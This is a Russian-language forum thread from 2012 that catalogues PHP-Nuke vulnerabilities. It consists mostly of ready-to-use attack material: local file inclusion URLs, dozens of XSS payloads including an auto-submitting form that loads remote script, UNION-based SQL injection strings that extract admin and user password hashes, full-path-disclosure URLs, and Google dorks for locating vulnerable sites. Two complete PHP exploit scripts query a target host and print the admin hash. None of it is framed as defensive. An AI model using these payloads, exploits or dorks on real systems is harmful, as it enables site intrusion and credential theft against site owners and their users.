| | |
|
Обзор уязвимостей PHP-Nuke
| |
Decide | Дата: Среда, 14.11.2012, 11:15 | Сообщение # 1 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-NUKE NukeSentinel Module
Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.
[Local File Inclusion]
PHP код: http://site/autohtml.php?filename=../file.php
http://site/autohtml0.php?filename=../file.php
[Information Leakage]
PHP код: http://site/autohtml.php?filename=../.htaccess
http://site/autohtml0.php?filename=../.htaccess
С помощью локального инклюда можно обнаружить важную информацию на сервере. В частности в .htaccess можно узнать настройки сайта, в том числе полный путь (что будет full path disclosure), при использовании NukeSentinel на сайте. А также можно обнаружить путь к его конфигурации и получить логины и хэши админов.
[Full path disclosure]
PHP код: http://site/autohtml.php?filename=12345
На некоторых сайтах с данным скриптом, где не отключено выведение ошибок, при указании несуществующего файла выводится сообщение об ошибке с полным путём к скрипту.
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:16 | Сообщение # 2 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| XSS Code modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script> modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script> modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337> modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script>< modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays= modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays= modules.php?name=Journal&file=friend&jid=2&yun= modules.php?name=Journal&file=friend&jid=2&ye= modules.php?name=Journal&file=add&filelist[]= modules.php?name=Journal&file=modify&filelist[]= modules.php?name=Journal&file=delete&jid=&forwhat=waraxe modules.php?name=Journal&file=comment&onwhat= modules.php?name=FAQ&myfaq=yes&id_cat=1&categories= modules.php?name=Encyclopedia&op=terms&eid=1<r= modules.php?name=Encyclopedia&op=content&tid=774&page=2&query= modules.php?name=Encyclopedia&file=search&eid= modules.php?name=Encyclopedia&file=search&query=f00bar&eid= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&url_title=foobar&url= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&cover= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&rlanguage= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&hits= modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&reviewer= modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9 modules.php?name=News&file=article&sid=1&optionbox= modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date= modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l= modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0 modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0 modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold= modules.php?name=NukeJokes&func=CatView&cat= modules.php?name=NukeJokes&func=JokeView&jokeid= modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle= modules.php?name=Downloads&d_op=viewsdownload&sid= modules.php?name=Search&sid= modules.php?name=Search&query=*&max= modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments modules.php?name=Search&a=6&query=*&match= modules.php?name=Search&query=*&mod3= modules.php?name=Calendar&file=submit&type= modules.php?name=Calendar&file=submit&op2=Preview&day= modules.php?name=Calendar&file=submit&op2=Preview&month= modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query] modules.php?name=NukeJokes&func=CatView&cat=[xss code here] modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here] modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2 modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2 modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2 modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2 modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS] banners.php?op=EmailStats&login=[our_login]&cid=1&bid= modules.php?name=Encyclopedia&file=index&op=terms&eid=1<r=
Code <html> <form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index> <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> <input type=submit name=sub> <script>document.searchform.sub.click()</script> </html>
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:16 | Сообщение # 3 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| SQL injection:
Code modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,p wd,url,url,10000,name%20FROM%20nuke_authors/* modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_a uthors modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_aut hors%20WHERE%201/* modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user _id%20FROM%20nuke_users modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_passwor d,1%20FROM%20nuke_users/* modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_u sers%20WHERE%20user_id=5 modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_u sers%20WHERE%20user_id=5 modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_passw ord,name,user_email,user_level,0,0%20FROM%20nuke_u sers modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_passwor d%20FROM%20nuke_users/* modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_ authors modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_aut hors/* modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20n uke_authors modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_autho rs modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_autho rs%20LIMIT%201,2 modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1 modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1 modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:16 | Сообщение # 4 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Full Path Disclosure modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=00@b.org&reviewer=oob&date=00b /modules/Web_Links/voteinclude.php /modules.php?name=Statistics&op=convert_month /modules.php?name=Journal&file=add&filelist=oob /modules.php?name=Journal&file=modify&filelist=oob /db/db.php index.php?inside_mod=1 /modules.php?name=Downloads&d_op=menu /modules.php?name=Web_Links&l_op=menu modules.php?name=Web_Links&l_op=viewlink&cid=1&show=oob modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=oob modules.php?name=NukeJokes&func=CatView&cat=oob modules.php?name=Downloads&d_op=viewdownload&cid=2&show=oob modules/Calendar/config.php modules/Calendar/index.php /modules/Calendar/submit.php error.php?newlang=foobar modules/coppermine/include/crop.inc.php modules/coppermine/ecard.php modules/coppermine/displayecard.php modules/coppermine/db_input.php modules/coppermine/config.php modules/coppermine/addpic.php modules/coppermine/phpinfo.php modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=foobar modules.php?name=NukeJokes&func=CatView&cat=foobar modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1
dork: "create the Super User" "now by clicking here" inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation" "Warning: setlocale()" intitle:PHP-nuke.powered.site "create * Super User" "now * clicking here" "Powered by PHP-Nuke" Copyright © 2003 by PHP-Nuke "allinurl:modules.php sgallery" "powered by phphnuke 6.0" intitle:"PHP-Nuke Powered Site"
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:16 | Сообщение # 5 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Remote SQL Injection
Vulnerable: PHP-Nuke <= 8.0
Exploit: Code <?php ################################################## ######## # UNPUBLISHED RST/GHC EXPLOIT # PHP Nuke `sid` sql injection exploit for Search module # POST method - # the best for version 8.0 FINAL # (c)oded by Foster & 1dt.w0lf ################################################## ######## # tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions ################################################## ########
if (isset($_POST['Submit'])){ $result=sendit('CONCAT("::",aid,"::",pwd,"::")'); if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches)) {$ahash = $matches[2]; $aname = $matches[1];}
}
function sendit($param){ $prefix = $_POST['prefix']; $data = $_POST['sql_text']; $host = $_POST['hostname']; $page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : ''; $page .= '/modules.php?name=Search'; $method = $_POST['method']; $ref_text = $_POST['ref_text']; $user_agent = $_POST['user_agent']; $result = ''; $sock = fsockopen($host, 80, $errno, $errstr, 50); if (!$sock) die("$errstr ($errno)\n"); fputs($sock, "$method /$page HTTP/1.0\r\n"); fputs($sock, "Host: $host" . "\r\n"); fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($sock, "Content-length: " . strlen($data) . "\r\n"); fputs($sock, "Referer: $ref_text". "\r\n"); fputs($sock, "User-Agent: $user_agent" . "\r\n"); fputs($sock, "Accept: */*\r\n"); fputs($sock, "\r\n"); fputs($sock, "$data\r\n"); fputs($sock, "\r\n");
while (!feof($sock)) { $result .= fgets ($sock,8192); } fclose($sock); return $result;
}
?>
<head> <meta http-equiv=Content-Type content="text/html; charset=windows-1251"> <TITLE>RST/GHC PHP Nuk'em exploit</TITLE> <style> a:link{color: #000000; text-decoration: none;} a:visited{color: #000000; text-decoration: none;} a:hover,a:active{color:#e49a34; text-decoration:underline;} table{color:#000000;font-family:verdana;font-size:8pt;} .style2 { color: #FFFFFF; font-weight: bold; } .style3 {color: #E39930} .style5 {color: #000000; font-weight: bold; } </style> <body bgcolor="#525254"> <form method=post> <p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p> <table width="900" border="0"> <tr bgcolor="#FFFFFF"> <td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td> <td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url </font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font> </strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60"> </font></td> </tr> <tr> <td bgcolor="E39930">SQL query</td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_ authors%20WHERE%20radminsuper=\'1'; ?>" size="80"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user agent</font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td> <td bgcolor="#999999"><select name="method" size="1" id="method"> <option value="POST">POST</option> <option value="GET">GET</option> </select></td> </tr> <tr> <td bgcolor="E39930"> </td> <td bgcolor="#999999"> </td> </tr> </table> <p> <input type="submit" name="Submit" value="rock-n-roll"> </p> </form>
<font size="2">(c) RST/GHC</font>
<hr size="3"> <? # DEBUG
print $result; ?>
# milw0rm.com [2008-01-22]
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:17 | Сообщение # 6 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Remote SQL Injection
PHP-Nuke < 8.0
Exploit
Code <?php error_reporting (E_ERROR); ini_set("max_execution_time",0);
echo ' +=========================================+ | RST/GHC unpublished PHP Nuke exploit <8 | +=========================================+ <+> version <8.0 <+> Tested on 7.9 & 6.0 ';
if ($argc < 2){ print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n"; print "ex.: " . $argv[0] . " phpnuke.org 7\n"; credits(); exit; }
/* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];}
switch ($argv[2]){ case "6": $query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20 as%20aid,null%20as%20time,pwd%20as%20title,null%20 as%20hometext,aid%20as%20bodytext,null%20as%20topi c,null%20as%20informant,null%20as%20notes,null%20a s%20acomm,%20null%20as%20haspoll,null%20as%20pollI D,null%20as%20score,null%20as%20ratings%20FROM%20% 60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%2 0as%20aid,null%20as%20time,pwd%20as%20title,null%2 0as%20hometext,aid%20as%20bodytext,null%20as%20top ic,null%20as%20informant,null%20as%20notes,null%20 as%20acomm,%20null%20as%20haspoll,null%20as%20poll ID,null%20as%20score,null%20as%20ratings%20FROM%20 %60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1"; $version = 7; break; }
$host = 'http://' . $argv[1] . '/'; # argv[1] - host $http = $host . $query; echo '[+] host: '.$host . ' [+] nuke version: '.$version.' '; #DEBUG //print $http . "\n";
$result = file_get_contents($http);
preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];} else {echo "Exploit failed...";}
credits();
function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; }
?>
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:18 | Сообщение # 7 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability
example Code http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}
EXPLOIT 1 :
Code -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_ uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201
EXPLOİT 2 :
Code -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_ uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users /*where%20admin%201=%201
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:18 | Сообщение # 8 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-Nuke Module Sections (artid) Remote SQL Injection
SQL Injection Code Пример:
www.xxX/xxxxSections&op=viewarticle&artid=(exploit)
Код:
9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
Для поиска сайтов с этим модулем:
Код: allinurl: "имя секции"
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:18 | Сообщение # 9 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-NUKE Modules Okul v1.0 Remote SQL Injection
SQL Injection
Code modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
PHP-Nuke Module Inhalt (cid) SQL Injection
SQL Injection
Code modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:19 | Сообщение # 10 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection
SQL Injection
Code modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
PHP-Nuke Module Siir (id) Remote SQL Injection
SQL Injection
Code modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:20 | Сообщение # 11 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability
Code modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu ke_authors
Exploit_2:
Code modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_a uthors
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:20 | Сообщение # 12 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| SQL Injection
Exploit:
Код:
modules.php?name=Sell&d_op=viewsell&cid=- 9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0, aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:20 | Сообщение # 13 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| SQL Injection
Exploit:Code modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:27 | Сообщение # 14 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| XSS Заходим на http://rus-phpnuke.com/ в поле поиска вбиваем "><iframe src="javascript:alert(document.cookie);" < и видим куки. Ксс в первом посте найденая ettee не пройдет, т.к. там стоит жесткая фильтрация гета, или только кодированием.
Sql inj modules 4nAlbum File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198 example: http://site.name/modules....xploit] Injection: -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/*
зы сплойты пойдут лесом если их правильно не закодировать. ^__^ {c}gibson
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:27 | Сообщение # 15 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| PHP-Nuke Copyright 2005 SQL
Exploit: Код:
-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors +where+radminsuper=1
modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1, aid,pwd+from+nuke_authors+where+radminsuper=1
Google dork: Код:
allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi" allinurl:"gaestebuch_v22&func"
|
|
| |
| |
| | |
|
|